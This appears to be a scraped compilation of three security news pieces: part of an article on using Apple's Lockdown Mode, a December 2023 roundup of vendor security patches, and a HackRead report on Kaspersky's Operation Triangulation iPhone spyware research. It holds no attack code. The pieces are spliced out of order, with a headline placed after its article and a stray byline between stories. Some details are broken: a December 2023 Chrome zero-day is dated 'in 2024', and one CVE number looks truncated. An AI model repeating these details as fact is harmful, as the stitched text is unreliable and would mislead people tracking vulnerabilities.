When malware developers target Apple devices, they tailor their attacks to exploit weaknesses in the complex features of iOS and macOS that facilitate communication and data sharing and handle different file types and information formats. So Lockdown Mode aims to make it much harder for commercial spyware vendors or other motivated and well-resourced actors to develop exploit chains that combine vulnerabilities in multiple iOS or macOS features to take control of devices. In practice, this means that it's harder and less fun to casually share—and especially receive—links, GIFs, and integrated elements in tools like Messages. And services like HomeKit are curtailed as well.

For example, you can still use Apple Pay with Lockdown Mode, but its integrations with other apps are much less fluid. If someone sends you a payment through Apple Cash, you can receive it, but you'll only get a very general, unspecific message in Messages that something has occurred— you won't know that someone sent you money on Apple Cash. Links don't expand when you send and receive them, and if you send or receive a link to an image or other file, it will send as text-only—a gnarly, full URL with no preview and no hyperlink that would let you automatically open it in a browser.

As part of Apple's most recent updates for Lockdown Mode in June, the company added support for Apple Watch and began automatically removing geolocation data from photos when you share them. The improvements also include a move to block devices by default from joining unsecured Wi-Fi networks and 2G cellular networks—a change meant to protect against malicious Wi-Fi networks and the mobile data surveillance tool known as stingrays.

This set of updates enabled “safer wireless connectivity defaults, media handling, media sharing defaults, sandboxing, and network security optimizations,” Apple said in a statement at the time. “Turning on Lockdown Mode further hardens device defenses and strictly limits certain functionalities, sharply reducing the attack surface for those who need additional protections.”

Lockdown Mode also places some restrictions on web browsing in Apple's Safari and other browsers. When this impacts crucial features and performance on particular sites that users trust, they can add them individually to an “excluded websites” list. Users can also selectively turn off Lockdown Mode limitations for some third-party apps like Gmail.

Ultimately, though, the feature doesn't offer many power user configurations precisely because the whole point is to keep everything on lock. But by and large, you can continue to function normally while using Lockdown Mode. Sometimes you'll miss a call from someone you've never interacted with digitally before or need extra seconds to convey something you're trying to share to a friend, but the restrictions start to make sense and become more intuitive over time. As one Reddit user put it last year, “Usable for the most part. Don't really notice it until you run into the cons.”

This is the instantly recognizable experience of using Lockdown Mode. It's all good until it stops you from doing something you really, really want to do.

“It's a great additional layer of security for Apple to offer,” says longtime Mac security researcher and Objective-See Foundation founder Patrick Wardle. “But balancing security and usability is super tough, and it shows that usability is king for most people—myself included. I turned off Lockdown Mode because it blocked the feature where two-factor SMS codes show up as an autofill option in websites, forms, etc. I think Apple did a great job with it, yet as soon as it impacted a feature that I love and use a lot, I turned it off.”

For some, it's the loss of shared albums in Photos. For others, it's the limitations of enjoying a meme with friends. But if you really need Lockdown Mode for your digital safety and personal protection, it's a workable alternative to throwing your phone in the ocean.

What It’s Like to Use Apple’s Lockdown Mode

Plus: Apple shuts down a Flipper Zero Attack, Microsoft patches more than 30 vulnerabilities, and more critical updates for the last month of 2023.

December was a hectic month for updates as firms including Apple and Google rushed to get patches out to fix serious flaws in their products before the holiday break.

Enterprise software giants also issued their fair share of patches, with Atlassian and SAP squashing several critical bugs during December.

Here’s what you need to know about the important updates you might have missed during the month.

Apple iOS

In mid-December, Apple released iOS 17.2, a major point upgrade containing features such as the Journal app, as well as 12 security patches. Among the flaws fixed in iOS 17.2 is CVE-2023-42890, an issue in the WebKit browser engine that could allow an attacker to execute code.

Another flaw in the iPhone’s Kernel, tracked as CVE-2023-4291, could see an app break out of its secure sandbox, Apple wrote on its support page. Meanwhile, two vulnerabilities in ImageIO, CVE-2023-42898 and CVE-2023-42899, could lead to code execution.

The iOS 17.2 update also put a mechanism in place to prevent a Bluetooth attack using a penetration testing device called Flipper Zero, according to tests by ZDNET and 9to5Mac. The annoying denial of service cyber-assault could cause a flurry of pop ups to appear on an iPhone and eventually lock up the device.

Apple also released iOS 16.7.3, Safari 17.2, macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2, tvOS 17.2 and watchOS 10.2.

Just one week after releasing iOS 17.2, Apple issued iOS 17.2.1 and iOS 16.7.4 for older devices, alongside macOS Sonoma 14.2.1. The surprise iPhone update contains unspecified bug and security fixes, while the macOS patch fixes a single flaw tracked as CVE-2023-42940.

Google Android

The Google Android December Security Bulletin was a hefty one, fixing nearly 100 security issues. The update includes patches for two critical issues in the Framework, the most severe of which could lead to remote escalation of privilege with no additional privileges needed. User interaction is not needed for exploitation, Google said.

CVE-2023-40088 is a critical flaw in the System that could lead to remote code execution, while CVE-2023-40078 is an elevation of privilege bug rated as having a high impact.

Google has also issued an update for its smart device WearOS platform, fixing CVE-2023-40094, an elevation of privilege flaw. The Pixel Security Bulletin has not been posted at the time of writing.

Google Chrome

Google ended a bumper December of updates in style with an emergency fix for its Chrome browser. The eighth zero-day vulnerability impacting Chrome in 2024, CVE-2023-7024 is a heap buffer overflow issue in the open source WebRTC component. Google is “aware that an exploit for CVE-2023-7024 exists in the wild,” the browser maker said in an advisory.

It wasn’t the first fix released by Google in December. The software giant also issued a Chrome patch mid-month to fix nine security issues. Of the flaws reported by external researchers, five are rated as having a high severity, including CVE-2023-6702, a type confusion flaw in V8, and four use-after-free bugs.

Earlier in the month Google released Chrome 120, fixing 10 security flaws, including two rated as having a high severity. CVE-2023-6508 is a use-after-free bug in Media Stream, while CVE-2023-6509 is a use-after-free issue in Side Panel Search.

Microsoft

Microsoft’s December Patch Tuesday fixes over 30 vulnerabilities including several remote code execution (RCE) flaws. Among the critical fixes is CVE-2023-36019, a spoofing vulnerability in Microsoft Power Platform Connector with a CVSS score of 9.6. The issue could see an attacker manipulate a malicious link, app, or file to trick the victim. However, you would have to click on a specially crafted URL to be compromised.

Meanwhile, CVE-2023-35628 is a Windows MSHTML Platform RCE bug rated as critical with a CVSS score of 8.1. “The attacker could exploit this vulnerability by sending a specially crafted email which triggers automatically when it is retrieved and processed by the Outlook client,” Microsoft said, adding that this could lead to exploitation before the email is viewed in the Preview Pane.

It was a fairly light Patch Tuesday, and none of the issues fixed in the month’s update cycle are known to have been exploited, but it still makes sense to apply the fixes as soon as you can.

Mozilla Firefox

Mozilla has fixed 18 security vulnerabilities in its Firefox browser, a third of which are rated as having a high severity. Of these, CVE-2023-6856 is a heap-buffer-overflow issue affecting WebGL DrawElementsInstanced method with Mesa VM driver that could allow an attacker to perform remote code execution and sandbox escape.

Meanwhile, Mozilla has also fixed memory safety bugs tracked as CVE-2023-6864 and CVE-2023-6873. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

Apache

The Apache Software Foundation has issued a patch for a flaw in its Struts 2 open source developer framework. Tracked as CVE-2023-50164, the issue is rated as critical with a CVSS score of 9.8.

Using the vulnerability, an attacker could manipulate file upload parameters to enable paths traversal. Under some circumstances, this could lead to uploading a malicious file and be used to perform RCE, according to a security advisory.

To fix the flaw, it’s important to upgrade to Struts 2.5.33 or Struts 6.3.0.2 as soon as possible.

Atlassian

Enterprise software giant Atlassian has issued a patch to fix critical RCE vulnerabilities in its Confluence Data Center and Server. Tracked as CVE-2023-22522, the template injection vulnerability allows an authenticated attacker to inject unsafe user input into a Confluence page. “Using this approach, an attacker is able to achieve RCE on an affected instance,” Atlassian said in an advisory.

Marked as critical with a CVSS score of 9, the bug affects all versions including and after 4.0.0 of Confluence Data Center and Server. Atlassian “recommends patching to the latest version or a fixed LTS version” to address the issue.

Other patches released by Atlassian during the month include a fix for an RCE vulnerability in the Atlassian macOS app, an RCE bug in Assets Discovery, and a SnakeYAML library RCE issue impacting multiple products.

SAP

Business software maker SAP has released its December Security Patch Day, fixing several serious security flaws. The most critical, with a CVSS score of 9.1, are four escalation-of-privilege bugs in SAP Business Technology Platform tracked as CVE-2023-49583, CVE-2023-50422, CVE-2023-50423, and CVE-2023-50424.

“It allows an unauthenticated attacker to obtain arbitrary permissions within the application leading to high impact on the application’s confidentiality and integrity,” security firm Onapsis said.

Meanwhile, CVE-2023-42481 is an improper access control vulnerability in SAP Commerce Cloud with a CVSS score of 8.1. “This allows a user who is actually blocked to regain access to the application, leading to considerable impact on confidentiality and integrity,” according to Onapsis.

Google Fixes Nearly 100 Android Security Issues

By Deeba Ahmed
Triangulation of Terror: Inside the Most Sophisticated iPhone Spyware Campaign Ever Seen.
This is a post from HackRead.com Read the original post: iPhone Spyware Exploits Obscure Chip Feature, Targets Researchers

The findings came as part of Operation Triangulation, months after Kaspersky discovered that their employees’ iPhones had been hacked by spyware.

Kaspersky Global Research and Analysis Team (GReAT) has discovered an obscure hardware feature likely exploited by hackers during **spyware attacks against iPhone users**.

The attacks were part of an APT campaign dubbed Operation Triangulation, which has been active since 2019, targeting iOS devices Using **zero-click exploits via iMessage**, allowing attackers to gain control and access user data. It was discovered by Kaspersky this summer.

The yet publicly undocumented feature is a part of Apple’s system-on-a-chip (SoC) and was probably included in the iPhone for debugging or testing purposes by Apple engineers, or added in the final consumer version mistakenly. Nevertheless, it allowed attackers to bypass protections and hijack devices in attacks targeting Kaspersky senior employees’ iPhones.

The research into **Operation Triangulation** was conducted by the cybersecurity vendor, Kaspersky. It is worth noting that the operation kicked off when Kaspersky researchers identified that their employees’ iPhones were hacked by spyware.

On December 27, 2023, the company shared the **findings** in a presentation titled “Operation Triangulation: What You Get When Attack iPhones of Researchers” at the 37th Chaos Communication Congress held in Hamburg and published in a report authored by Boris Larin.

During the presentation, researchers explained that multiple iOS zero-day vulnerabilities (including an RCE issue in Apple’s ADJUST TrueType font instruction **CVE-2023-41990** and **CVE-2023-38606**, a bypass of hardware-based security protections) were exploited to execute code and install a stealthy spyware implant, known as TriangleDB.

These vulnerabilities were used to target iPhones running iOS versions up to **iOS 16.6**. The most critical of these was CVE-2023-38606 for allowing a JavaScript exploit to bypass the Page Protection Layer.

The attackers used malicious **iMessage attachments** to exploit a remote code execution zero-day and deploy TriangleDB without user interaction. The infection chain involved multiple checks and log-erasing actions to prevent malware identification. Researchers discovered new attacks/exploits daily, calling it the most sophisticated chain of attack they had ever witnessed.  

> _“We have discovered and reported more than thirty in-the-wild zero-days in Adobe, Apple, Google, and Microsoft products, but this is the most sophisticated attack chain we have ever seen.”_
> 
> Kaspersky – GReAT

The obscure feature allowed overriding of hardware-based security to protect the kernel, the core part of an operating system. Attackers could then write data to a specific physical address while “bypassing hardware-based memory protection by writing the data, destination address, and data hash to unknown hardware registers of the chip unused by the firmware.”

The attackers exploited MMIO registers from the GPU coprocessor, bypassing Apple’s DeviceTree ranges to write to memory, bypass protections, and achieve RCE.

Correlation of the gfx-asc MMIO ranges and the addresses used by the exploit (Kaspersky)

Apple responded by releasing security updates to address four zero-day vulnerabilities impacting various Apple products: **CVE-2023-32434**, **CVE-2023-32435**, CVE-2023-38606, and CVE-2023-41990.

However, there are still many unanswered questions, such as the purpose of this feature, how attackers learned to use it considering that the firmware didn’t use it and whether it was developed by Apple or a third-party component like ARM CoreSight.

****_RELATED ARTICLES_****

1.  **Hackers Targeting Apple’s M1 Chip with Mac Malware**
2.  **Turns out iPhone 5c can be hacked with a $100 hardware**
3.  **Apple Safari Safest, Google Chrome Riskiest Browser – Study**
4.  **Apple Bug bounty: Earn big for hacking iPhone, other products**
5.  **iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser**

Tag

#ios